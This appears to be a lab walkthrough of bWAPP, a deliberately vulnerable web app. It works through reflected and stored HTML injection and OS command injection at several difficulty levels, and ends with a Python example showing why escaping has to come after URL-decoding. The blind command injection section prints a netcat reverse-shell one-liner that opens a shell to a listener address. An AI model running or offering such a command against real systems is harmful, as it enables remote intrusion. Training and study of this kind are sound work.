# BWAPP

## HTML injection

We know HTML injection as XSS (cross-site scripting). This vulnerability allows us to inject code into a web page. If we inject code into a web page and send it to other people, our code runs too when they open the page.

## HTML Injection - Reflected (GET)

![First look](https://i.imgur.com/ausoF1G.png)

The GET method shows the values in the URL.

### Low Level

![Try to input html language](https://i.imgur.com/RK60r7t.png)

We can input HTML in this section.

### Medium Level

Do the same thing as at the low level.

![No working any more](https://i.imgur.com/7AflOH6.png)

Try to encode the values before submitting them.

![Encode to url](https://i.imgur.com/ymt95XS.png)

It's working.

### High Level

Do the same thing as at the medium level.

![Don't work](https://i.imgur.com/zyzgtU1.png)

I don't know how to exploit this level; it might be a WAF (Web Application Firewall).

## HTML Injection - Reflected (POST)

![First look](https://i.imgur.com/Sbpu795.png)

The POST method does not show the values in the URL.

### Low Level

![Try to input html language](https://i.imgur.com/RCkAf8P.png)

We can input HTML in this section.

### Medium Level

Do the same thing as at the low level.

![No working any more](https://i.imgur.com/JkxiAtb.png)

Try to encode the data before submitting it.

![Encode to url](https://i.imgur.com/tjUxRn1.png)

It's working.

### High Level

Do the same thing as at the medium level.

![Don't work](https://i.imgur.com/Us7oh2P.png)

Cannot exploit it; it might be a WAF (Web Application Firewall).

## HTML Injection - Reflected (URL)

![First look](https://i.imgur.com/I0Sdp4G.png)

We can change the hostname.

### Low Level

![change hostname to google.com](https://i.imgur.com/J8UFfMe.png)

Use Burp Suite to edit the hostname.

![use burpsuite to input html tag](https://i.imgur.com/ZTjWipA.png)

![result](https://i.imgur.com/tYlvC8a.png)

We can put an HTML tag into this website because it doesn't check the value again.

### Medium Level

![](https://i.imgur.com/VEhmPQx.png)

It cannot be done, as the screenshot shows.

### High Level

Cannot exploit it.

## HTML Injection - Stored (Blog)

![first look](https://i.imgur.com/uppOX6U.png)

### Low Level

We can try to input an HTML tag.

![can do](https://i.imgur.com/lqU54ea.png)

### Medium Level

![](https://i.imgur.com/0r4AS7L.png)

Cannot bypass.

### High Level

Cannot bypass.

## OS Command Injection

![first look](https://i.imgur.com/c83AZty.png)

Also known as shell injection, this is a web security vulnerability that allows an attacker to execute OS commands. In this section we can put a Linux command after the IP, e.g. using `&&` or `|`.

### Low Level

![ex](https://i.imgur.com/td2X8yZ.png)

![linux command](https://i.imgur.com/TW8GQdb.png)

### Medium Level

![same command](https://i.imgur.com/19eOrbF.png)

It's still working.

### High Level

Not working.

## OS Command Injection - Blind

![first look](https://i.imgur.com/NOeurTb.png)

We can use a web shell.

### Low Level

![listening port](https://i.imgur.com/3BNcgc6.png)

Then use the command below from pentestmonkey.com:

```
127.0.0.1| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.184.128 4444 >/tmp/f
```

![and we will get shell like this](https://i.imgur.com/oM3Wnwv.png)

![find data](https://i.imgur.com/2yXOuEF.png)

### Medium Level

Trying the same command does not work. Try another command.
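
Going back to the HTML Injection - Reflected levels: the pattern seen there (raw tags blocked at medium but URL-encoded tags accepted, nothing accepted at high) is what a filter produces when it neutralises angle brackets before URL-decoding, compared with one that HTML-escapes as the last step. The following is an added example, not code from the original write-up or from bWAPP; the function names and the filter logic are assumptions that model the observed behaviour, and the inputs are constructed.

```python
import html
from urllib.parse import unquote

# Constructed sample inputs (the parameter value as the application sees it).
RAW = "<h1>test</h1>"
ENCODED = "%3Ch1%3Etest%3C%2Fh1%3E"   # RAW, URL-encoded once more by the tester


def render_low(value: str) -> str:
    """No filtering: the value is reflected unchanged."""
    return "Welcome " + value


def render_medium(value: str) -> str:
    """Flawed order: neutralise angle brackets, then URL-decode the result."""
    filtered = value.replace("<", "&lt;").replace(">", "&gt;")
    return "Welcome " + unquote(filtered)   # decoding re-creates < and >


def render_high(value: str) -> str:
    """Correct order: decode first, HTML-escape as the last step before output."""
    return "Welcome " + html.escape(unquote(value), quote=True)


def has_live_markup(page: str) -> bool:
    """True if the reflected value reached the page as a real tag."""
    return "<h1>" in page


def survey() -> dict:
    """Map (level, input name) -> whether markup survived into the page."""
    levels = {"low": render_low, "medium": render_medium, "high": render_high}
    inputs = {"raw": RAW, "encoded": ENCODED}
    return {(lv, name): has_live_markup(fn(val))
            for lv, fn in levels.items() for name, val in inputs.items()}


if __name__ == "__main__":
    for key, injected in survey().items():
        print(key, "-> markup rendered" if injected else "-> neutralised")
```

The fix is the ordering in `render_high`: every decoding step happens before the escape, so no later transformation can turn harmless text back into markup.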